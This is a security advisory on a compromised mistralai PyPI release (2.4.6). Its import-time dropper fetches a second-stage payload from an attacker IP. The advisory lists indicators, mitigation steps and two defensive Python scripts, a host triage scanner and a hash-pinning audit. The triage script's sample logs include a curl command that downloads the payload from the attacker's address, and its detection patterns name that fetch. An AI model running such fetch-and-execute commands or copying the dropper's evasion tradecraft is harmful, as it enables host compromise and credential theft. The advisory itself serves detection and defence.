Intelligence | Severity: Critical | Type: Vulnerability | Status: Active

Supply Chain Compromise: Malicious Dropper in mistralai PyPI Package v2.4.6

The mistralai PyPI package v2.4.6 was compromised with a malicious dropper that runs at module import time on Linux hosts. The release was published outside the project's legitimate release pipeline (PyPI Trusted Publishing), so it never went through the normal build-and-release flow. This is a high-impact supply chain attack affecting every system that installed this specific version.

Sebastion

Affected

mistralai/client-python==2.4.6

Vulnerability Description

This is a supply chain compromise involving unauthorized package tampering. The mistralai PyPI package v2.4.6 contains injected malicious code that executes at module load time, before any user code runs. The vulnerability class is arbitrary code execution through a malicious dependency, not a bug in the library's own logic. The root cause is unauthorized access to the PyPI upload path: the release did not come through the repository's PyPI Trusted Publishing workflow, which points to credential compromise, account takeover, or exploitation of PyPI infrastructure (which of these occurred is not established here). The impact is severe: any process that imports mistralai==2.4.6 executes attacker-controlled code with that process's privileges, so the blast radius is whatever the importing service can reach (secrets, cloud credentials, data, adjacent hosts).

Proof-of-Concept Significance

This PoC is significant because it demonstrates a fully realized, in-the-wild supply chain attack rather than a theoretical vulnerability. The malicious code uses obfuscated imports and conditional execution (Linux-only, environment variable gating) to evade casual inspection. The dropper fetches a secondary payload (transformers.pyz) from an external C2 server and executes it asynchronously in a new session, detached from the importing process for stealth. Preconditions are minimal: any Linux Python environment that installed this exact version and imported the package is compromised. Execution is deterministic; there is no race, memory-corruption step, or user interaction involved, so it succeeds on every affected import.

Detection Guidance

Package-level indicators:

  • Scan pip freeze output, requirements files, and lock files for mistralai==2.4.6; use pip show mistralai in each environment (virtualenvs, containers, CI runners) to confirm the installed version
  • Query the PyPI JSON API or run pip-audit/safety against each environment; because this advisory has no CVE, match on the exact package version rather than relying on a CVE lookup
  • Review pip logs, and the logs of any internal PyPI mirror or artifact proxy, for mistralai installations during the compromise window

Runtime indicators:

  • Creation of /tmp/transformers.pyz on Linux hosts
  • A python process executing /tmp/transformers.pyz with stdout/stderr redirected to /dev/null and started in a new session (setsid-style backgrounding), parented by the process that imported mistralai
  • Outbound HTTPS (TCP/443) connections to 83.142.209.194
  • MISTRAL_INIT=1 present in the environment of the spawned child process
  • curl subprocesses with -k/--insecure (skip TLS certificate verification) and -L (follow redirects); if wget is used instead, the equivalent is --no-check-certificate, since wget's -k means --convert-links

Logs to monitor:

  • Application stderr/stdout for exceptions raised at import time (the injected code may fail where its preconditions or dependencies are missing)
  • auditd for open/create/execve events on /tmp/transformers.pyz (for example a watch rule: auditctl -w /tmp/transformers.pyz -p rwxa -k mistralai_dropper)
  • Network/flow logs for TLS sessions to 83.142.209.194, plus DNS answers resolving to it if a hostname was used; the address may since have been sinkholed, so absence of current traffic is not evidence that a host was never infected
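The following host triage script is an added example, not code from the advisory or from the mistralai project. It ties the package-level and runtime indicators above together: it reads the installed version via importlib.metadata, checks for the dropped file, runs the indicator patterns over arbitrary text (auditd, process or flow log lines), and applies the same patterns to the .py files of the installed distribution. The sample freeze text and log lines are constructed for illustration, and the URL path in the curl line is an assumption, not an observed value.

```python
"""Host triage for the mistralai==2.4.6 compromise (added example)."""
import re
from importlib import metadata
from pathlib import Path

COMPROMISED_VERSION = "2.4.6"
C2_IP = "83.142.209.194"
DROP_PATH = Path("/tmp/transformers.pyz")

# Indicator patterns taken from the advisory's runtime indicators. The curl
# pattern accepts combined short flags (-kL) as well as the long forms.
INDICATORS = {
    "c2_ip": re.compile(re.escape(C2_IP)),
    "payload_path": re.compile(r"/tmp/transformers\.pyz"),
    "payload_exec": re.compile(r"\bpython3?\b.*?/tmp/transformers\.pyz"),
    "env_gate": re.compile(r"\bMISTRAL_INIT=1\b"),
    "insecure_fetch": re.compile(
        r"\bcurl\b(?=.*(?:\s-[A-Za-z]*k|--insecure))(?=.*(?:\s-[A-Za-z]*L|--location))"
    ),
}
FREEZE_LINE = re.compile(r"^\s*mistralai\s*==\s*2\.4\.6\s*$", re.IGNORECASE | re.MULTILINE)


def installed_version(dist="mistralai"):
    """Version string of an installed distribution, or None if absent."""
    try:
        return metadata.version(dist)
    except metadata.PackageNotFoundError:
        return None


def is_compromised_version(version):
    return version == COMPROMISED_VERSION


def freeze_lists_compromised(freeze_text):
    """True if pip freeze / requirements text pins mistralai==2.4.6."""
    return FREEZE_LINE.search(freeze_text) is not None


def scan_text(lines):
    """Return (1-based line number, indicator name, line) for every hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.append((n, name, line))
    return hits


def scan_installed_files(dist="mistralai"):
    """Run the indicator scan over the .py files of an installed distribution."""
    try:
        files = metadata.files(dist) or []
    except metadata.PackageNotFoundError:
        return []
    hits = []
    for f in files:
        if f.suffix != ".py":
            continue
        try:
            text = f.read_text()
        except (OSError, UnicodeDecodeError):
            continue
        hits.extend((str(f), n, name) for n, name, _ in scan_text(text.splitlines()))
    return hits


def triage(freeze_text, log_lines, drop_path=DROP_PATH):
    """Combine every check into one report dict."""
    version = installed_version()
    return {
        "installed_version": version,
        "compromised_version_installed": is_compromised_version(version),
        "freeze_lists_compromised": freeze_lists_compromised(freeze_text),
        "payload_present": Path(drop_path).exists(),
        "log_hits": scan_text(log_lines),
        "source_hits": scan_installed_files(),
    }


# Constructed sample data, not real captures; the curl URL path is assumed.
SAMPLE_FREEZE = "httpx==0.27.0\nmistralai==2.4.6\npydantic==2.7.1\n"
SAMPLE_LOGS = [
    'type=EXECVE msg=audit(1.0:1): argc=2 a0="python3" a1="/tmp/transformers.pyz"',
    'type=PATH msg=audit(1.0:2): name="/tmp/transformers.pyz" nametype=CREATE',
    "flow src=10.0.0.12 dst=83.142.209.194 dport=443 proto=tcp",
    "sh -c 'curl -kL https://83.142.209.194/transformers.pyz -o /tmp/transformers.pyz'",
    "environ: MISTRAL_INIT=1 PATH=/usr/bin",
    "pip install requests",
]

if __name__ == "__main__":
    for key, value in triage(SAMPLE_FREEZE, SAMPLE_LOGS).items():
        print(f"{key}: {value}")
```

Run it inside each virtualenv or container image you need to clear, feeding it the environment's own pip freeze output and exported log lines; a non-empty log_hits or source_hits on a host that never legitimately ran mistralai is the signal to escalate.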

Mitigation Steps

  1. Immediate: Remove the package from every environment (pip uninstall -y mistralai) and purge cached copies so they cannot be silently reinstalled (pip cache remove mistralai); check internal mirrors and base container images for the same version
  2. Reinstall: Pin a known-good release (mistralai==2.4.5 or earlier) and confirm with pip show mistralai
  3. Isolation: Treat any Linux host that imported the malicious version as compromised: quarantine or rebuild it, rotate credentials and tokens the importing process could read (API keys, cloud credentials, SSH keys), and review process logs for execution of the secondary payload
  4. Remediation: Kill any lingering python /tmp/transformers.pyz processes and delete /tmp/transformers.pyz if present; uninstalling the package does not stop a second stage that is already running
  5. Scanning: Run full antivirus/EDR scans on affected hosts and check for persistence mechanisms (cron entries, systemd units, shell profiles, modified site-packages)
  6. Future prevention: Pin dependencies with hashes and install with pip install --require-hashes -r requirements.txt, run pip-audit or safety in CI/CD, restrict outbound HTTPS from build and runtime hosts to known-good destinations, and audit PyPI account access logs and the Trusted Publishing configuration
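The requirements audit below is an added example for step 6, not code from the advisory or the mistralai project. It parses a requirements file, flags entries that are not pinned to an exact version, entries without a --hash (which pip install --require-hashes refuses), and any pin of a release the advisory names as compromised; artifact_matches shows the sha256 comparison pip performs against a downloaded file. The sample requirements and their digests are constructed placeholders, not real wheel hashes.

```python
"""Requirements audit for hash-pinned installs (added example)."""
import hashlib
import re

# Known-bad releases from this advisory: normalized project name -> versions.
COMPROMISED = {"mistralai": {"2.4.6"}}

REQ_LINE = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*(==|~=|>=|<=|!=|>|<)?\s*([^\s;#\\]*)")
HASH_OPT = re.compile(r"--hash=sha256:([0-9a-f]{64})")


def normalize(name):
    """PEP 503 project-name normalization, so Mistral_AI and mistral-ai compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def logical_lines(text):
    """Strip comments and join backslash-continued lines into one logical line."""
    out, buf = [], ""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        buf += line
        if buf.strip():
            out.append(buf.strip())
        buf = ""
    if buf.strip():
        out.append(buf.strip())
    return out


def parse_requirements(text):
    """Return dicts with normalized name, operator, version and sha256 hashes."""
    entries = []
    for line in logical_lines(text):
        if line.startswith("-"):  # pip options such as -r or --index-url
            continue
        m = REQ_LINE.match(line)
        if not m:
            continue
        name, op, version = m.groups()
        entries.append({
            "name": normalize(name),
            "op": op,
            "version": version,
            "hashes": set(HASH_OPT.findall(line)),
        })
    return entries


def audit_requirements(text):
    """Return human-readable findings; an empty list means the file passes."""
    findings = []
    for e in parse_requirements(text):
        spec = f"{e['name']}{e['op'] or ''}{e['version']}"
        if e["op"] != "==":
            findings.append(f"{spec}: not pinned to an exact version")
        if not e["hashes"]:
            findings.append(f"{spec}: no --hash, pip --require-hashes would refuse it")
        if e["version"] in COMPROMISED.get(e["name"], set()):
            findings.append(f"{spec}: known compromised release, remove it")
    return findings


def artifact_matches(data, allowed_hashes):
    """The check pip performs: the downloaded file's sha256 must be one of the pinned digests."""
    return hashlib.sha256(data).hexdigest() in set(allowed_hashes)


# Constructed sample; the digests are placeholders, not real wheel hashes.
FAKE_HASH_A = "a" * 64
FAKE_HASH_B = "b" * 64
SAMPLE_REQUIREMENTS = f"""\
# constructed requirements.txt
mistralai==2.4.6 \\
    --hash=sha256:{FAKE_HASH_A}
httpx>=0.27
pydantic==2.7.1 \\
    --hash=sha256:{FAKE_HASH_B}
"""

if __name__ == "__main__":
    for finding in audit_requirements(SAMPLE_REQUIREMENTS):
        print(finding)
```

Wire audit_requirements into CI as a gate before pip install: with hashes pinned and --require-hashes enforced, a replaced release such as 2.4.6 fails the install on digest mismatch even if the version number is reused, and the compromised-release table turns the advisory into a hard block until every lock file has moved off it.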

Risk Assessment

Likelihood of exploitation: Very high. This is an active, confirmed compromise affecting everyone who installed v2.4.6 on Linux. The package has been quarantined on PyPI, but copies may already sit in pip caches, internal mirrors, and built container images. Because each compromised host fetched the second stage from the attacker's server, the operator likely holds a list of affected hosts.

Threat actor interest: Critical. Supply chain attacks on widely used ML/AI packages (mistralai has significant adoption) are highly valued. The attack pattern (dropper, then a fetched secondary payload) is consistent with APT tradecraft, suggesting organized threat activity rather than opportunistic abuse. The use of HTTPS C2, detaching the payload into a new session, and conditional execution indicates operational sophistication. Organizations that deployed mistralai==2.4.6 in production are at immediate risk of full compromise of the affected hosts and of everything those hosts' credentials can reach.